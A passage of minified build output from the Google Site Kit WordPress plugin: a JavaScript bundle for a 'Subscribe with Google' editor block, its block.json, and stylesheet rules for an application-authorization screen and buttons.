B().useLayoutEffect(e,t)},t.useMemo=function(e,t){return B().useMemo(e,t)},t.useReducer=function(e,t,r){return B().useReducer(e,t,r)},t.useRef=function(e){return B().useRef(e)},t.useState=function(e){return B().useState(e)},t.version="16.14.0"},441:e=>{"use strict";e.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},452:e=>{!function(){"use strict";var t={}.hasOwnProperty;function r(){for(var e="",t=0;t<arguments.length;t++){var r=arguments[t];r&&(e=o(e,n(r)))}return e}function n(e){if("string"==typeof e||"number"==typeof e)return e;if("object"!=typeof e)return"";if(Array.isArray(e))return r.apply(null,e);if(e.toString!==Object.prototype.toString&&!e.toString.toString().includes("[native code]"))return e.toString();var n="";for(var i in e)t.call(e,i)&&e[i]&&(n=o(n,i));return n}function o(e,t){return t?e?e+" "+t:e+t:e}e.exports?(r.default=r,e.exports=r):"function"==typeof define&&"object"==typeof define.amd&&define.amd?define("classnames",[],function(){return r}):window.classNames=r}()},540:(e,t,r)=>{"use strict";e.exports=r(192)},664:e=>{"use strict";var t=Object.getOwnPropertySymbols,r=Object.prototype.hasOwnProperty,n=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},r=0;r<10;r++)t["_"+String.fromCharCode(r)]=r;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var n={};return"abcdefghijklmnopqrst".split("").forEach(function(e){n[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},n)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var i,c,u=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),s=1;s<arguments.length;s++){for(var a in i=Object(arguments[s]))r.call(i,a)&&(u[a]=i[a]);if(t){c=t(i);for(var l=0;l<c.length;l++)n.call(i,c[l])&&(u[c[l]]=i[c[l]])}}return u}},688:(e,t,r)=>{e.exports=r(362)()},696:(e,t,r)=>{"use strict";e.exports=r(403)}},t={};function __webpack_require__(r){var n=t[r];if(void 0!==n)return n.exports;var o=t[r]={exports:{}};return e[r](o,o.exports,__webpack_require__),o.exports}__webpack_require__.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return __webpack_require__.d(t,{a:t}),t},__webpack_require__.d=(e,t)=>{for(var r in t)__webpack_require__.o(t,r)&&!__webpack_require__.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},__webpack_require__.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{"use strict";const e=wp.blocks,t=googlesitekit.data,r="core/modules",n="kmAnalyticsTopCategories",o="modules/reader-revenue-manager",i=googlesitekit.i18n,c=((0,i.__)("Specific content types","google-site-kit"),(0,i.__)("Specified pages","google-site-kit"),(0,i.__)("Site wide","google-site-kit"),"reader-revenue-manager"),u="core/editor",s=wp.components,a=wp.element;var l,p=__webpack_require__(452),f=__webpack_require__.n(p),d=__webpack_require__(688),y=__webpack_require__.n(d),_=__webpack_require__(696);function h(){return h=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)({}).hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},h.apply(null,arguments)}const b=e=>_.createElement("svg",h({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},e),l||(l=_.createElement("g",{fill:"none",fillRule:"evenodd"},_.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 2.253-9.748"}),_.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 9c-5.77 0-10.64 3.725-12.348 8.91"}),_.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),_.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"}))));var m=__webpack_require__(540);function EditorButton({children:e,disabled:t}){return(0,m.jsxs)("button",{disabled:t,className:f()("googlesitekit-blocks-reader-revenue-manager-button",{"googlesitekit-blocks-reader-revenue-manager-button--disabled":t}),children:[(0,m.jsx)(b,{height:"18",width:"18"}),e]})}EditorButton.propTypes={children:y().node.isRequired,disabled:y().bool.isRequired};const g=wp.blockEditor,v=wp.data;function w({hasModuleAccess:e,withModuleAccessNotice:t,withoutModuleAccessNotice:r}){return void 0===e?null:e?t:r}function ButtonEdit({buttonLabel:e,requiredPaymentOption:n,invalidPaymentOptionWithModuleAccessNotice:i,invalidPaymentOptionWithoutModuleAccessNotice:l,noSnippetWithModuleAccessNotice:p,noSnippetWithoutModuleAccessNotice:f}){const[d,y]=(0,a.useState)(void 0),_=(0,g.useBlockProps)();(0,a.useEffect)(()=>{!async function(){let e=(0,t.select)(r).hasModuleOwnership(c);!1===e&&(e=await(0,t.resolveSelect)(r).hasModuleAccess(c)),y(!!e)}()},[]);const h=(0,t.select)(o).getSettings(),{publicationID:b,paymentOption:k,snippetMode:S,postTypes:O}=h,P=`googlesitekit_rrm_${b}:productID`,E=(0,v.useSelect)(e=>e(u).getEditedPostAttribute("meta")?.[P]||""),j=(0,v.useSelect)(e=>e(u).getCurrentPostType()),{notice:A,disabled:x}=function({paymentOption:e,requiredPaymentOption:t,hasModuleAccess:r,postProductID:n,snippetMode:o,postTypes:i,postType:c,invalidPaymentOptionWithModuleAccessNotice:u,invalidPaymentOptionWithoutModuleAccessNotice:s,noSnippetWithModuleAccessNotice:a,noSnippetWithoutModuleAccessNotice:l}){return e!==t?{disabled:!0,notice:w({hasModuleAccess:r,withModuleAccessNotice:u,withoutModuleAccessNotice:s})}:"none"===n||!n&&"per_post"===o||!n&&"post_types"===o&&!i.includes(c)?{disabled:!0,notice:w({hasModuleAccess:r,withModuleAccessNotice:a,withoutModuleAccessNotice:l})}:{disabled:!1,notice:null}}({paymentOption:k,requiredPaymentOption:n,hasModuleAccess:d,postProductID:E,snippetMode:S,postTypes:O,postType:j,invalidPaymentOptionWithModuleAccessNotice:i,invalidPaymentOptionWithoutModuleAccessNotice:l,noSnippetWithModuleAccessNotice:p,noSnippetWithoutModuleAccessNotice:f});return(0,m.jsxs)(a.Fragment,{children:[A&&(0,m.jsx)(g.InspectorControls,{children:(0,m.jsx)("div",{className:"block-editor-block-card",children:(0,m.jsx)(s.Notice,{status:"warning",isDismissible:!1,children:A})})}),(0,m.jsx)("div",{..._,children:(0,m.jsx)("div",{className:"googlesitekit-blocks-reader-revenue-manager",children:(0,m.jsx)(EditorButton,{disabled:x,children:e})})})]})}function Edit(){const e=(0,t.select)(o).getPublicationID(),r=(0,t.select)(o).getServiceURL({path:"reader-revenue-manager",query:{publication:e}});return(0,m.jsx)(ButtonEdit,{select:t.select,buttonLabel:/* translators: Button label for Subscribe with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L24-L57 (please refer to the latest version of the file) */ /* translators: Button label for Subscribe with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L24-L57 (please refer to the latest version of the file) */ (0,i.__)("Subscribe with Google","google-site-kit"),requiredPaymentOption:"subscriptions",invalidPaymentOptionWithModuleAccessNotice:(0,a.createInterpolateElement)((0,i.__)("You need to set up a paywall in Reader Revenue Manager to use this block. <a>Go to Reader Revenue Manager</a>","google-site-kit"),{a:(0,m.jsx)(s.ExternalLink,{href:r})}),invalidPaymentOptionWithoutModuleAccessNotice:(0,i.__)("You need to set up a paywall in Reader Revenue Manager to use this block. Contact your administrator.","google-site-kit"),noSnippetWithModuleAccessNotice:(0,a.createInterpolateElement)((0,i.__)("This post does not include the Reader Revenue Manager snippet. Configure the snippet for this post in the post settings sidebar.","google-site-kit"),{a:(0,m.jsx)(s.ExternalLink,{href:r})}),noSnippetWithoutModuleAccessNotice:(0,i.__)("This post does not include the Reader Revenue Manager snippet. Contact your administrator","google-site-kit")})}ButtonEdit.propTypes={buttonLabel:y().string.isRequired,requiredPaymentOption:y().string.isRequired,invalidPaymentOptionWithModuleAccessNotice:y().node.isRequired,invalidPaymentOptionWithoutModuleAccessNotice:y().node.isRequired,noSnippetWithModuleAccessNotice:y().node.isRequired,noSnippetWithoutModuleAccessNotice:y().node.isRequired};const k=JSON.parse('{"UU":"google-site-kit/rrm-subscribe-with-google"}');!async function(){await Promise.all([(0,t.resolveSelect)(r).getModule(c),(0,t.resolveSelect)("core/user").getUser(),(0,t.resolveSelect)(o).getSettings()]);const n=!!(0,t.select)("core/edit-site");(0,e.registerBlockType)(k.UU,{edit:()=>n?null:(0,m.jsx)(Edit,{}),supports:{inserter:!n}})}()})()})();{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "google-site-kit/rrm-subscribe-with-google", "version": "1.170.0", "title": "Subscribe with Google", "category": "widgets", "icon": "google", "description": "Allow users to subscribe using Reader Revenue Manager to access content behind a paywall.", "textdomain": "google-site-kit", "supports": { "inserter": true } } .authorize-application-php{background-color:#fff}.authorize-application-php .wrap{margin:30px 0 0}.authorize-application-php .wrap h1{font-size:24px;line-height:32px;padding:0}.authorize-application-php .auth-app-card{border:none;margin:37px 0 0;padding:0}.authorize-application-php .auth-app-card p{font-size:14px;font-weight:500;line-height:20px;margin:19px 0 20px}.authorize-application-php .title{font-size:18px;font-weight:500;line-height:24px}.authorize-application-php strong{font-weight:500}.authorize-application-php .form-field{margin:20px 0 40px;max-width:512px}.authorize-application-php .form-field label{color:#1f1f1f;font-size:12px;font-weight:500;line-height:16px}.authorize-application-php .form-field input{border:1px solid #747775;border-radius:8px;color:#1f1f1f;font-size:14px;line-height:20px;margin:8px 0 0;padding:12px 16px;width:100%}.authorize-application-php .description{color:#1f1f1f;font-size:12px;line-height:16px}.authorize-application-php .description strong{display:block;margin:9px 0 0;max-width:512px}.authorize-application-php .description code{background-color:#ededed;border-radius:4px;color:#1f1f1f;display:inline-block;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;line-height:16px;padding:4px 9px}.authorize-application-php .googlesitekit-authorize-application__footer{display:none}@media(min-width: 783px){.authorize-application-php .googlesitekit-authorize-application__footer{bottom:0;display:block;left:0;line-height:32px;margin-left:36px;padding:0 47px;position:absolute}.authorize-application-php .googlesitekit-authorize-application__footer p{color:#1f1f1f;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:500;line-height:20px;margin:19px 0 20px}}@media(min-width: 961px){.authorize-application-php .googlesitekit-authorize-application__footer{margin-left:160px}}html[dir=rtl] .googlesitekit-authorize-application__footer{left:auto;margin-right:36px;right:0}@media(min-width: 961px){html[dir=rtl] .googlesitekit-authorize-application__footer{margin-right:160px}}#wpbody-content{padding-bottom:100px}@media(max-width: 782px){.auto-fold #wpcontent{padding:0 26px}}#wpcontent,#wpfooter{color:#1f1f1f;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif}@media(min-width: 783px){#wpcontent,#wpfooter{padding:0 47px}}#wpbody-content a,#wpfooter a{color:#1a73e8}#wpfooter{bottom:45px}#approve,#reject{border-radius:100px;font-size:14px;font-weight:500;line-height:20px;margin:0 0 15px;padding:10px 24px}#approve{background-color:#0b57d0;border:none;color:#fff}#approve:hover{box-shadow:0 0 0 1000px rgba(255,255,255,.08) inset}#approve:focus{box-shadow:0 0 0 1000px rgba(255,255,255,.12) inset}#reject{background-color:#fff;border:1px solid #747775;color:#0b57d0}#reject:hover{box-shadow:0 0 0 1000px rgba(11,87,208,.08) inset}#reject:focus{border:1px solid #0b57d0;box-shadow:0 0 0 1000px rgba(11,87,208,.12) inset}#description-approve{border-bottom:1px solid #c4c7c5;margin:0 0 33px;padding:0 0 31px}#description-reject{margin:0 0 8px}#footer-thankyou{font-size:12px;line-height:16px} .mdc-button{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:2.25rem;font-weight:500;letter-spacing:.0892857143em;-webkit-text-decoration:none;text-decoration:none;text-transform:uppercase;padding:0 8px 0 8px;display:inline-flex;position:relative;align-items:center;justify-content:center;box-sizing:border-box;min-width:64px;height:36px;border:none;outline:none;line-height:inherit;-webkit-user-select:none;user-select:none;-webkit-appearance:none;overflow:hidden;vertical-align:middle;border-radius:4px}.mdc-button::-moz-focus-inner{padding:0;border:0}.mdc-button:active{outline:none}.mdc-button:hover{cursor:pointer}.mdc-button:disabled{background-color:transparent;color:rgba(0,0,0,.37);cursor:default;pointer-events:none}.mdc-button.mdc-button--dense{border-radius:4px}.mdc-button:not(:disabled){background-color:transparent}.mdc-button .mdc-button__icon{margin-left:0;margin-right:8px;display:inline-block;width:18px;height:18px;font-size:18px;vertical-align:top}[dir=rtl] .mdc-button .mdc-button__icon,.mdc-button .mdc-button__icon[dir=rtl]{margin-left:8px;margin-right:0}.mdc-button:not(:disabled){color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-button__label+.mdc-button__icon{margin-left:8px;margin-right:0}[dir=rtl] .mdc-button__label+.mdc-button__icon,.mdc-button__label+.mdc-button__icon[dir=rtl]{margin-left:0;margin-right:8px}svg.mdc-button__icon{fill:currentColor}.mdc-button--raised .mdc-button__icon,.mdc-button--unelevated .mdc-button__icon,.mdc-button--outlined .mdc-button__icon{margin-left:-4px;margin-right:8px}[dir=rtl] .mdc-button--raised .mdc-button__icon,.mdc-button--raised .mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--unelevated .mdc-button__icon,.mdc-button--unelevated .mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--outlined .mdc-button__icon,.mdc-button--outlined .mdc-button__icon[dir=rtl]{margin-left:8px;margin-right:-4px}.mdc-button--raised .mdc-button__label+.mdc-button__icon,.mdc-button--unelevated .mdc-button__label+.mdc-button__icon,.mdc-button--outlined .mdc-button__label+.mdc-button__icon{margin-left:8px;margin-right:-4px}[dir=rtl] .mdc-button--raised .mdc-button__label+.mdc-button__icon,.mdc-button--raised .mdc-button__label+.mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--unelevated .mdc-button__label+.mdc-button__icon,.mdc-button--unelevated .mdc-button__label+.mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--outlined .mdc-button__label+.mdc-button__icon,.mdc-button--outlined .mdc-button__label+.mdc-button__icon[dir=rtl]{margin-left:-4px;margin-right:8px}.mdc-button--raised,.mdc-button--unelevated{padding:0 16px 0 16px}.mdc-button--raised:disabled,.mdc-button--unelevated:disabled{background-color:rgba(0,0,0,.12);color:rgba(0,0,0,.37)}.mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){color:#fff;color:var(--mdc-theme-on-primary, #fff)}.mdc-button--raised{box-shadow:0px 3px 1px -2px rgba(0, 0, 0, 0.2),0px 2px 2px 0px rgba(0, 0, 0, 0.14),0px 1px 5px 0px rgba(0,0,0,.12);transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1)}.mdc-button--raised:hover,.mdc-button--raised:focus{box-shadow:0px 2px 4px -1px rgba(0, 0, 0, 0.2),0px 4px 5px 0px rgba(0, 0, 0, 0.14),0px 1px 10px 0px rgba(0,0,0,.12)}.mdc-button--raised:active{box-shadow:0px 5px 5px -3px rgba(0, 0, 0, 0.2),0px 8px 10px 1px rgba(0, 0, 0, 0.14),0px 3px 14px 2px rgba(0,0,0,.12)}.mdc-button--raised:disabled{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0.2),0px 0px 0px 0px rgba(0, 0, 0, 0.14),0px 0px 0px 0px rgba(0,0,0,.12)}.mdc-button--outlined{border-style:solid;padding:0 15px 0 15px;border-width:1px}.mdc-button--outlined:disabled{border-color:rgba(0,0,0,.37)}.mdc-button--outlined:not(:disabled){border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-button--dense{height:32px;font-size:.8125rem}@keyframes mdc-ripple-fg-radius-in{from{animation-timing-function:cubic-bezier(0.4, 0, 0.2, 1);transform:translate(var(--mdc-ripple-fg-translate-start, 0)) scale(1)}to{transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}}@keyframes mdc-ripple-fg-opacity-in{from{animation-timing-function:linear;opacity:0}to{opacity:var(--mdc-ripple-fg-opacity, 0)}}@keyframes mdc-ripple-fg-opacity-out{from{animation-timing-function:linear;opacity:var(--mdc-ripple-fg-opacity, 0)}to{opacity:0}}.mdc-ripple-surface--test-edge-var-bug{--mdc-ripple-surface-test-edge-var: 1px solid #000;visibility:hidden}.mdc-ripple-surface--test-edge-var-bug::before{border:var(--mdc-ripple-surface-test-edge-var)}.mdc-button{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-button::before,.mdc-button::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-button::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-button.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-button.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-button.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-button.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-button.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-button::before,.mdc-button::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-button.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-button::before,.mdc-button::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-button::before,.mdc-button::after{background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-button:hover::before{opacity:.04}.mdc-button:not(.mdc-ripple-upgraded):focus::before,.mdc-button.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-button:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-button:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-button.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-button--raised::before,.mdc-button--raised::after,.mdc-button--unelevated::before,.mdc-button--unelevated::after{background-color:#fff}@supports not (-ms-ime-align: auto){.mdc-button--raised::before,.mdc-button--raised::after,.mdc-button--unelevated::before,.mdc-button--unelevated::after{background-color:var(--mdc-theme-on-primary, #fff)}}.mdc-button--raised:hover::before,.mdc-button--unelevated:hover::before{opacity:.08}.mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,.mdc-button--raised.mdc-ripple-upgraded--background-focused::before,.mdc-button--unelevated:not(.mdc-ripple-upgraded):focus::before,.mdc-button--unelevated.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.mdc-button--raised:not(.mdc-ripple-upgraded)::after,.mdc-button--unelevated:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-button--raised:not(.mdc-ripple-upgraded):active::after,.mdc-button--unelevated:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.mdc-button--raised.mdc-ripple-upgraded,.mdc-button--unelevated.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button{box-shadow:none;font-weight:500;text-transform:none}.googlesitekit-plugin .mdc-button:not(:disabled){color:#3c7251}@media(max-width: 960px){.googlesitekit-plugin .mdc-button{min-width:auto}}.googlesitekit-plugin .mdc-button .mdc-button__icon--image{border-radius:50%;display:block;height:18px;width:18px}.googlesitekit-plugin .mdc-button .mdc-button__trailing-icon{margin-left:8px}.googlesitekit-plugin .mdc-button--raised{border-radius:100px;box-shadow:none;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:40px;padding-bottom:8px;padding-top:8px;text-align:center}.googlesitekit-plugin .mdc-button--raised:not(:disabled){background-color:#3c7251}.googlesitekit-plugin .mdc-button--raised:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--raised::before,.googlesitekit-plugin .mdc-button--raised::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--raised::before,.googlesitekit-plugin .mdc-button--raised::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--raised:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--raised.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--raised:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--raised.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--raised.mdc-button--dense{border-radius:100px}.googlesitekit-plugin .mdc-button--raised:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--raised:focus{outline:none}.googlesitekit-plugin .mdc-button--danger:not(:disabled){background-color:#ac4220}.googlesitekit-plugin .mdc-button--danger:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--danger::before,.googlesitekit-plugin .mdc-button--danger::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--danger::before,.googlesitekit-plugin .mdc-button--danger::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--danger:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--danger.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--danger:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--danger.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--dropdown{background-image:url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2212%22%20height%3D%228%22%20viewBox%3D%220%200%2012%208%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M10.6.6L12%202%206%208%200%202%201.4.6%206%205.2z%22%20fill%3D%22%23757575%22%20fill-rule%3D%22evenodd%22%2F%3E%3C%2Fsvg%3E");background-position:calc(100% - 8px) center;background-repeat:no-repeat;background-size:9px 6px;letter-spacing:normal;padding-right:12px;text-transform:none}.googlesitekit-plugin .mdc-button--dropdown:not(:disabled){color:#161b18}@media(min-width: 600px){.googlesitekit-plugin .mdc-button--dropdown{padding-right:25px}}.googlesitekit-plugin .mdc-button--dropdown:hover,.googlesitekit-plugin .mdc-button--dropdown:active,.googlesitekit-plugin .mdc-button--dropdown:focus{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-button--dropdown:hover:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:active:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:focus:not(:disabled){background-color:#ebeef0}.googlesitekit-plugin .mdc-button--dropdown:hover:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:active:not(:disabled),.googlesitekit-plugin .mdc-button--dropdown:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .mdc-button--dropdown:hover::before,.googlesitekit-plugin .mdc-button--dropdown:hover::after,.googlesitekit-plugin .mdc-button--dropdown:active::before,.googlesitekit-plugin .mdc-button--dropdown:active::after,.googlesitekit-plugin .mdc-button--dropdown:focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--dropdown:hover::before,.googlesitekit-plugin .mdc-button--dropdown:hover::after,.googlesitekit-plugin .mdc-button--dropdown:active::before,.googlesitekit-plugin .mdc-button--dropdown:active::after,.googlesitekit-plugin .mdc-button--dropdown:focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .mdc-button--dropdown:hover:hover::before,.googlesitekit-plugin .mdc-button--dropdown:active:hover::before,.googlesitekit-plugin .mdc-button--dropdown:focus:hover::before{opacity:.04}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:hover.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--dropdown:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--dropdown:hover:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--dropdown:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .mdc-button--dropdown:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-button--dropdown:hover.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--dropdown:active.mdc-ripple-upgraded,.googlesitekit-plugin .mdc-button--dropdown:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}@media(max-width: 599px){.googlesitekit-plugin .mdc-button--dropdown{background-image:none}}@media(max-width: 599px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}}@media(min-width: 600px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:220px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}}@media(min-width: 960px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:300px}}@media(min-width: 1280px){.googlesitekit-plugin .mdc-button--dropdown .mdc-button__label{max-width:450px}}.googlesitekit-plugin .mdc-button--inverse:not(:disabled){background-color:#161b18}.googlesitekit-plugin .mdc-button--inverse:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-plugin .mdc-button--inverse::before,.googlesitekit-plugin .mdc-button--inverse::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .mdc-button--inverse::before,.googlesitekit-plugin .mdc-button--inverse::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-plugin .mdc-button--inverse:hover::before{opacity:.08}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-button--inverse.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-button--inverse:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-plugin .mdc-button--inverse.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-plugin .mdc-button--tertiary{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;height:auto;letter-spacing:normal;min-height:40px;padding:8px 16px}.googlesitekit-plugin .mdc-button--tertiary:not(:disabled){color:#6c726e}.googlesitekit-plugin 